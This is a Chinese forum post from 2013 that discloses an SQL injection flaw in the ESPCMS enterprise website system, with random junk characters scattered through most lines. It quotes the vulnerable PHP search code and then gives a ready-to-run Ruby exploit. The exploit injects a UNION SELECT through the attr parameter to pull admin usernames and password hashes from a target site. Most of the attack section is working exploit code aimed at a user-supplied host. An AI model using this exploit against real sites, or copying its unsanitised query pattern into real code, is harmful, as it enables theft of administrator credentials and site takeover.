0×0 漏洞概述0×1 漏洞细节1 _7 P( B: z/ k* ?4 F: X
0×2 PoC
* Q% s2 d7 k. A3 U$ u! m, U
. o$ T% o# J" ?" p h \3 F6 p4 c& C2 { E6 N' D; G1 j3 J A
# q6 T& p6 T7 `; s, ^+ ^0×0 漏洞概述$ T, D& j1 O& |: d, G
! \" x- i+ L& j. c0 t% t
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
; D! {$ c& ]# m. ]- o6 }0 q2 f其在处理传入的参数时考虑不严谨导致SQL注入发生3 K1 W( a6 s5 i/ G
! n8 o$ R1 n7 [) b" D: z0 h( |" Z' M, X2 R. ^+ r2 |% r/ d
0×1 漏洞细节) j$ M, J! h2 N K X" m
. g* |" F( V4 T# ^( T7 o, x- N6 J1 H# M
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
0 n8 O$ p) x+ q7 j" r% z+ E7 ?正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
8 P4 {+ I2 E) d而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。" N7 `/ D9 D; g
' {& d" z, M: f, L. @在/interface/3gwap_search.php文件的in_result函数中:4 {! V4 R& t( d9 D( e
- G2 g; S# o* o1 z& c X9 h9 B5 K+ f# y9 n, {4 ^, t" t; L) S( z
& Z2 |$ E( [- b- j9 H2 ?: Z9 Q function in_result() {
# @" ?/ w4 f' I& t9 q ... ... ... ... ... ... ... ... ...
. m* Y0 c% e/ X5 r, K8 G) [% v $urlcode = $_SERVER[ 'QUERY_STRING '];
( C o" f7 }4 {8 d parse_str(html_entity_decode($urlcode), $output);( N) T$ f7 @/ D3 y) A
& `: q: A, |0 E! i0 H ... ... ... ... ... ... ... ... ...
1 T' q0 K2 J m9 [ if (is_array($output['attr' ]) && count($output['attr']) > 0) {- V: F1 R7 f0 a7 s6 @
) s" _ u# c% {1 y3 J1 ] $db_table = db_prefix . 'model_att';
/ }1 ?2 Z, L, [4 O; h' @" O. r# W6 J$ _* y% S
foreach ($output['attr' ] as $key => $value) {+ x) `% ]1 w& }5 M2 l) X! c
if ($value) {
; x/ s4 ]& K4 ?6 O. ^- Y- N- W
# `* d, j* b7 \' h7 }1 } $key = addslashes($key);
4 g5 k. J0 _! ?" q2 \ $key = $this-> fun->inputcodetrim($key);1 ?- E- E0 D3 D8 z* P
$db_att_where = " WHERE isclass=1 AND attrname='$key'";
" E' E0 i) p, L $countnum = $this->db_numrows($db_table, $db_att_where);
& s' n% H5 r- i+ q% |) g if ($countnum > 0) {4 u# }# k& j* Z8 z( u
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;& i/ n4 q+ S9 V% o
}
. B4 D9 M# c! Y }( R0 T9 w9 C! C# E3 `
}( y. M; L+ q) P% k, K2 r* X
}% P B6 e& {9 ] }- ^9 }( m' _
if (!empty ($keyword) && empty($keyname)) {1 Z- g( I7 p. f) d3 F9 u2 [
$keyname = 'title';+ [: T" o5 z, q3 @7 C# O
$db_where.= " AND a.title like '%$keyword%'" ;
Y0 d& K% u Y* A3 R6 J } elseif (!empty ($keyword) && !empty($keyname)) {* t0 f) K3 J, q) G
$db_where.= " AND $keyname like '% $keyword%'";& ^$ K# }: d/ \( w( b. B
}7 R" N; w# m3 W$ n7 @" `
$pagemax = 15;2 y+ \/ } U y
2 b8 E# i7 _( B
$pagesylte = 1;; l/ T* X6 ~6 X1 p% [
( i0 u8 x1 J0 l) `8 h0 o
if ($countnum > 0) {/ G8 [! _7 m5 B% U7 o
3 p( p5 Y2 d9 Y" R0 R
$numpage = ceil($countnum / $pagemax);
% `$ F3 h4 n! ], B7 ^; f+ O } else {' ]/ L6 m3 ~" ^" C+ p7 U
$numpage = 1;
+ d6 E& h' g5 O' l' p7 M }
! G! f' ]5 z+ B $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;( z$ B9 h- e& i- U& @9 K4 F
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);/ Z1 V, }( T; `- a6 X: V
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);' T- D: M- G/ u" x4 F
... ... ... ... ... ... ... ... ...
! S$ X3 e$ ?' m, ~# H& a! q }- w/ E, S0 W/ {- C. x
, O7 o: ]7 V( H$ t- ]
2 X( k$ _3 M4 l: z0 F0×2 PoC9 d; Q2 W; l3 M7 R0 V
( j( V7 q! s _% D9 R+ M/ v5 i
9 L: E2 s( b5 Q' p: ^( u5 o2 B. S) B( }2 U+ N+ ~! `
require "net/http"
) W. ?" o- O) v$ _. w$ Z$ i. ^, Y2 V7 T
def request(method, url)$ X( \: ]6 Q7 s
if method.eql?("get") j! Q+ U" k& a8 V
uri = URI.parse(url)
. D1 e8 U% Q9 ^/ W. c8 R http = Net::HTTP.new(uri.host, uri.port): W# S) y0 V, e5 ~* g
response = http.request(Net::HTTP::Get.new(uri.request_uri)); A3 N3 m& {+ w# H( f1 ]$ _
return response/ k( p$ ]9 O) y
end1 r/ F _. X5 u4 `
end
6 U/ b: |) E9 S) Y0 b7 [/ \% \/ A- M1 u* p. `. _7 Y3 C, J# y
doc =<<HERE
, @- w$ j$ E; T* g8 h-------------------------------------------------------
" P; o1 ?$ A, b4 ?1 f- f# p9 ^9 rEspcms Injection Exploit0 i" ]5 Q# Y/ \5 O) h4 D) _
Author:ztz! {! H6 M! m" d2 [1 a
Blog:http://ztz.fuzzexp.org/; c2 E& A: S0 ?0 l
-------------------------------------------------------
* s" Q$ }( C) P- ~" ]+ c" V, O. e! H. e$ R4 q! v g! h
HERE9 k5 {- y' [1 z7 q" y- s' n3 Z: W
% q2 H- w9 I9 M% w$ n# N0 ^
usage =<<HERE
5 v0 w4 ~% v# l" ?Usage: ruby #{$0} host port path$ l1 M7 x( l! }3 y
example: ruby #{$0} www.target.com 80 /
% w$ ^+ O% |9 a$ z* jHERE
! G8 q0 d2 M4 {/ `
6 k0 r7 |) N4 s: u. @puts doc* e# o9 S! S9 A9 H# c+ |9 B
if ARGV.length < 30 Z- |& k \% K8 s2 }4 G1 _; e" ?
puts usage0 O b4 I6 `0 a, f( G* N
else
' {8 f7 D! r. N $host = ARGV[0]
2 W# @7 s! v- T, c9 [. W $port = ARGV[1]
; G$ r: }+ ^3 s! u8 v- m $path = ARGV[2]
0 r7 y$ N+ r/ \. r/ x
* R% l5 I3 w4 Q9 u8 E% t9 Z puts "send request..."
% [ u. F2 U! Y9 M# H" s$ _ url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
. I* |3 y3 O0 [( h2 ?1 dattr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
2 O% {1 a: P. M$ E,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
5 U! w: N$ P0 n0 e- z,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"4 ?4 T6 |* z; \4 f2 }' b
response = request("get", url)! O% F# S1 j& U3 u3 C
result = response.body.scan(/\w+&\w{32}/)
1 n0 ?+ b' Z# j2 j# _ puts result
8 R1 m/ x8 D9 z$ \2 vend
: j2 B S- A! u* b( y: ]4 [: B. F* H B" b; \
|
发表于 2013-7-27 18:31:52
收藏
支持
反对